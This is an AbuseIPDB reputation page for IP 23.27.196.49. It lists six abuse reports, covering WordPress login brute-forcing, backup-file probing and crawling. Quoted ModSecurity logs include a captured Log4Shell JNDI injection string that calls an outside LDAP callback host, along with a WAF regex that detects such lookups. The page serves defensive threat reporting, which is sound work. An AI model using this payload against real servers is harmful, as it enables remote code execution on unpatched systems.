JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 23.27.196.49

23.27.196.49 was found in our database!

This IP was reported 6 times. Confidence of Abuse is 3%: ?

ISP	Ace Data Centers II, L.L.C.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS40676
Hostname(s)	23-27-196-49.ips.acedatacenter.com
Domain Name	acedatacenter.com
Country	🇺🇸 United States of America
City	Centreville, Virginia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 23.27.196.49

Whois 23.27.196.49

IP Abuse Reports for 23.27.196.49:

This IP address has been reported a total of 6 times from 4 distinct sources. 23.27.196.49 was first reported on May 27th 2025, and the most recent report was 1 week ago.

Old Reports: The most recent abuse report for this IP address is from 1 week ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇫🇷 bigorre.org	2026-05-29 10:50:07 (1 week ago)	Excessive crawling : exceed crawl-delay defined in robots.txt	Bad Web Bot
🇫🇷 tilellit.pro	2026-02-09 14:32:13 (3 months ago)	Fail2Ban banned 23.27.196.49 for security violations in jail wp-armour. Log: 2026/02/09 14:32:12 [er ... show more Fail2Ban banned 23.27.196.49 for security violations in jail wp-armour. Log: 2026/02/09 14:32:12 [error] FastCGI sent in stderr: "PHP message: [WP_ARMOUR_BAN] IP: 23.27.196.49 \| Target: wplogin" , client: 23.27.196.49, server: [REDACTED], request: "POST /wp-login.php HTTP/1.1", upstream: [REDACTED], host: [REDACTED], referrer: "https://comerciogallego.es/wp-login.php" ... show less	Web Spam
🇺🇸 TPI-Abuse	2025-08-01 06:41:02 (10 months ago)	(mod_security) mod_security (id:210730) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.co ... show more (mod_security) mod_security (id:210730) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Aug 01 02:40:44.755440 2025] [security2:error] [pid 3332372:tid 3332380] [client 23.27.196.49:60485] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|ftp.kettlehill.com\|F\|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.kettlehill.com"] [uri "/login.php.bak"] [unique_id "aIxhbB33aKcnOojmIbhR3wAAAoY"], referer: http://ftp.kettlehill.com/login.php.bak show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-06-01 13:51:20 (1 year ago)	(mod_security) mod_security (id:248270) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.co ... show more (mod_security) mod_security (id:248270) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Jun 01 09:51:16.927368 2025] [security2:error] [pid 2865685:tid 2865685] [client 23.27.196.49:54747] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at REQUEST_HEADERS:Accept. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|mail.nbcnewsradio.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "mail.nbcnewsradio.com"] [uri "/"] [unique_id "aDxa1BwIpI7EKSAm78nDGAAAABs"], referer: ${jndi:ldap://${:-817}${:-305}.${hostName}.referer.d0u5lg45d8ic0r479og0egqcoa51q8zs3.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-06-01 05:36:11 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.co ... show more (mod_security) mod_security (id:210492) triggered by 23.27.196.49 (23-27-196-49.ips.acedatacenter.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Jun 01 01:33:34.451713 2025] [security2:error] [pid 2256136:tid 2256220] [client 23.27.196.49:53553] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.staging.kettlehill.com"] [uri "/wp-config.php.orig"] [unique_id "aDvmLrVUnYIqO9hNDIS5eQAAAJA"] show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2025-05-27 03:30:02 (1 year ago)	\| Common web attack.	Hacking SQL Injection Web App Attack

Showing 1 to 6 of 6 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇳 206.183.111.36

🇦🇷 200.43.135.26

🇬🇧 185.247.137.67

🇺🇸 185.180.141.8

🇫🇷 185.177.72.24

🇺🇸 172.93.121.126

🇨🇳 27.155.120.135

🇬🇧 18.130.168.120

🇧🇷 200.149.213.242

🇮🇳 182.76.228.234

🇨🇳 123.185.10.190

🇨🇳 122.96.28.187

🇳🇱 103.176.90.41

🇨🇳 101.126.53.14

🇫🇷 91.231.89.189

🇺🇸 70.120.203.193

🇷🇺 46.165.56.242

🇳🇱 45.148.10.152

🇨🇳 36.135.100.48

🇩🇪 31.57.97.223